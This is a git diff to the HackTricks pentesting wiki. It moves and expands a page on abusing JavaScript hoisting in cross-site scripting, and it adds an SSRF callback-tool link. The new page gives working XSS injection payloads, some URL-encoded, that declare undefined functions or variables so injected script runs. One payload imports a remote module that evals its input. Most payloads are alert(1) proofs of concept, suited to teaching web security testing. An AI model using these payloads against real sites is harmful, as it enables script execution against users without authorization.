diff --git a/SUMMARY.md b/SUMMARY.md
index 086f12d68..544d90ca8 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -665,6 +665,7 @@
* [DOM Invader](pentesting-web/xss-cross-site-scripting/dom-invader.md)
* [DOM XSS](pentesting-web/xss-cross-site-scripting/dom-xss.md)
* [Iframes in XSS, CSP and SOP](pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md)
+ * [JS Hoisting](pentesting-web/xss-cross-site-scripting/js-hoisting.md)
* [Misc JS Tricks & Relevant Info](pentesting-web/xss-cross-site-scripting/other-js-tricks.md)
* [PDF Injection](pentesting-web/xss-cross-site-scripting/pdf-injection.md)
* [Server Side XSS (Dynamic PDF)](pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)
diff --git a/pentesting-web/ssrf-server-side-request-forgery/README.md b/pentesting-web/ssrf-server-side-request-forgery/README.md
index 25dcce5b4..3d0a18d5a 100644
--- a/pentesting-web/ssrf-server-side-request-forgery/README.md
+++ b/pentesting-web/ssrf-server-side-request-forgery/README.md
@@ -150,6 +150,7 @@ file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}
* [http://requestrepo.com/](http://requestrepo.com/)
* [https://app.interactsh.com/](https://app.interactsh.com/)
* [https://github.com/stolenusername/cowitness](https://github.com/stolenusername/cowitness)
+* [https://github.com/dwisiswant0/ngocok](https://github.com/dwisiswant0/ngocok) - A Burp Collaborator using ngrok
## SSRF via Referrer header
diff --git a/pentesting-web/xss-cross-site-scripting/README.md b/pentesting-web/xss-cross-site-scripting/README.md
index a0a8e667f..2a3ea498d 100644
--- a/pentesting-web/xss-cross-site-scripting/README.md
+++ b/pentesting-web/xss-cross-site-scripting/README.md
@@ -85,53 +85,12 @@ In this case your input is reflected between **``** tags
#### Javascript Hoisting
-Javascript Hoisting references the opportunity to **declare functions, variables or classes after they are used**.
+Javascript Hoisting references the opportunity to **declare functions, variables or classes after they are used so you can abuse scenarios where a XSS is using undeclared variables or functions.**\
+**Check the following page for more info:**
-Therefore if you have scenarios where you can **Inject JS code after an undeclared object** is used, you could **fix the syntax** by declaring it (so your code gets executed instead of throwing an error):
-
-```javascript
-// The function vulnerableFunction is not defined
-vulnerableFunction('test', '');
-// You can define it in your injection to execute JS
-//Payload1: param='-alert(1)-'')%3b+function+vulnerableFunction(a,b){return+1}%3b
-'-alert(1)-''); function vulnerableFunction(a,b){return 1};
-
-//Payload2: param=test')%3bfunction+vulnerableFunction(a,b){return+1}%3balert(1)
-test'); function vulnerableFunction(a,b){ return 1 };alert(1)
-```
-
-```javascript
-// If a variable is not defined, you could define it in the injection
-// In the following example var a is not defined
-function myFunction(a,b){
- return 1
-};
-myFunction(a, '')
-
-//Payload: param=test')%3b+var+a+%3d+1%3b+alert(1)%3b
-test'); var a = 1; alert(1);
-```
-
-```javascript
-// If an undeclared class is used, you cannot declare it AFTER being used
-var variable = new unexploitableClass();
-
-// But you can actually declare it as a function, being able to fix the syntax with something like:
-function unexploitableClass() {
- return 1;
-}
-alert(1);
-```
-
-```javascript
-// Properties are not hoisted
-// So the following examples where the 'cookie' attribute doesn´t exist
-// cannot be fixed if you can only inject after that code:
-test.cookie('leo','INJECTION')
-test['cookie','injection']
-```
-
-For more info about Javascript Hoisting check: [https://jlajara.gitlab.io/Javascript\_Hoisting\_in\_XSS\_Scenarios](https://jlajara.gitlab.io/Javascript\_Hoisting\_in\_XSS\_Scenarios)
+{% content-ref url="js-hoisting.md" %}
+[js-hoisting.md](js-hoisting.md)
+{% endcontent-ref %}
### Javascript Function
diff --git a/pentesting-web/xss-cross-site-scripting/js-hoisting.md b/pentesting-web/xss-cross-site-scripting/js-hoisting.md
new file mode 100644
index 000000000..2d526e168
--- /dev/null
+++ b/pentesting-web/xss-cross-site-scripting/js-hoisting.md
@@ -0,0 +1,157 @@
+# JS Hoisting
+
+
+
+☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+
+
+
+## Basic Information
+
+{% hint style="success" %}
+JavaScript Hoisting refers to the process whereby the **interpreter appears to move the declaration** of functions, variables, classes, or imports to the **top of their scope, prior to execution of the code**.
+{% endhint %}
+
+JavaScript engine will do (at least two) passes over any script. This is a big simplification, but we can think of JS execution as consisting of two steps. **First, the code is parsed**, which includes checking for **syntax errors** and converting it to an abstract syntax tree. This step also includes what we describe as **hoisting,** where certain forms of declarations are “moved”(hoisted) to the top of the execution stack. If the code passes the parsing step, the engine **continues to execute the script**.
+
+1. Any code (including the injected payload) must adhere to the syntax rules. **Nothing will execute if the syntax is invalid** anywhere in the final script.
+2. Where in a script code is placed might have importance, but **the text representation of a code snippet is not the same as what is executed** by the runtime in the end. Any language might have rules that decide what order expressions are executed.
+
+### The four types of hoisting
+
+Returning to MDN’s description of hoisting, we can read that there are four kinds of hoisting in JavaScript. Again, directly from MDN:
+
+> 1. Being able to use a variable’s value in its scope before the line it is declared. (“Value hoisting”)
+> 2. Being able to reference a variable in its scope before the line it is declared, without throwing a `ReferenceError`, but the value is always `undefined`. (“Declaration hoisting”)
+> 3. The declaration of the variable causes behavior changes in its scope before the line in which it is declared.
+> 4. The side effects of a declaration are produced before evaluating the rest of the code that contains it.
+
+followed by
+
+> The four function declarations above are hoisted with type 1 behavior; `var` declaration is hoisted with type 2 behavior; [`let`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/let), [`const`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/const), and [`class`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/class) declarations (also collectively called _lexical declarations_) are hoisted with type 3 behavior; [`import`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/import) declarations are hoisted with type 1 and type 4 behavior.
+
+## Scenarios
+
+Therefore if you have scenarios where you can **Inject JS code after an undeclared object** is used, you could **fix the syntax** by declaring it (so your code gets executed instead of throwing an error):
+
+```javascript
+// The function vulnerableFunction is not defined
+vulnerableFunction('test', '');
+// You can define it in your injection to execute JS
+//Payload1: param='-alert(1)-'')%3b+function+vulnerableFunction(a,b){return+1}%3b
+'-alert(1)-''); function vulnerableFunction(a,b){return 1};
+
+//Payload2: param=test')%3bfunction+vulnerableFunction(a,b){return+1}%3balert(1)
+test'); function vulnerableFunction(a,b){ return 1 };alert(1)
+```
+
+```javascript
+// If a variable is not defined, you could define it in the injection
+// In the following example var a is not defined
+function myFunction(a,b){
+ return 1
+};
+myFunction(a, '')
+
+//Payload: param=test')%3b+var+a+%3d+1%3b+alert(1)%3b
+test'); var a = 1; alert(1);
+```
+
+```javascript
+// If an undeclared class is used, you cannot declare it AFTER being used
+var variable = new unexploitableClass();
+
+// But you can actually declare it as a function, being able to fix the syntax with something like:
+function unexploitableClass() {
+ return 1;
+}
+alert(1);
+```
+
+```javascript
+// Properties are not hoisted
+// So the following examples where the 'cookie' attribute doesn´t exist
+// cannot be fixed if you can only inject after that code:
+test.cookie('leo','INJECTION')
+test['cookie','injection']
+```
+
+## More Scenarios
+
+```javascript
+// Undeclared var accessing to an undeclared method
+x.y(1,INJECTION)
+// You can inject
+alert(1));function x(){}//
+// And execute the allert with (the alert is resolved before it's detected that the "y" is undefined
+x.y(1,alert(1));function x(){}//)
+```
+
+```javascript
+// Undeclared var accessing 2 nested undeclared method
+x.y.z(1,INJECTION)
+// You can inject
+");import {x} from "https://example.com/module.js"//
+// It will be executed
+x.y.z("alert(1)");import {x} from "https://example.com/module.js"//")
+
+
+// The imported module:
+// module.js
+var x = {
+ y: {
+ z: function(param) {
+ eval(param);
+ }
+ }
+};
+
+export { x };
+```
+
+```javascript
+// In this final scenario from https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/
+// It was injected the: let config;`-alert(1)`//`
+// With the goal of making in the block the var config be empty, so the return is not executed
+// And the same injection was replicated in the body URL to execute an alert
+
+try {
+ if(config){
+ return;
+ }
+ // TODO handle missing config for: https://try-to-catch.glitch.me/"+`
+let config;`-alert(1)`//`+"
+ } catch {
+ fetch("/error", {
+ method: "POST",
+ body: {
+ url:"https://try-to-catch.glitch.me/"+`
+let config;`-alert(1)-`//`+""
+ }
+ })
+ }
+```
+
+## References
+
+* [https://jlajara.gitlab.io/Javascript\_Hoisting\_in\_XSS\_Scenarios](https://jlajara.gitlab.io/Javascript\_Hoisting\_in\_XSS\_Scenarios)
+* [https://developer.mozilla.org/en-US/docs/Glossary/Hoisting](https://developer.mozilla.org/en-US/docs/Glossary/Hoisting)
+* [https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/](https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/)
+
+
+
+☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+
+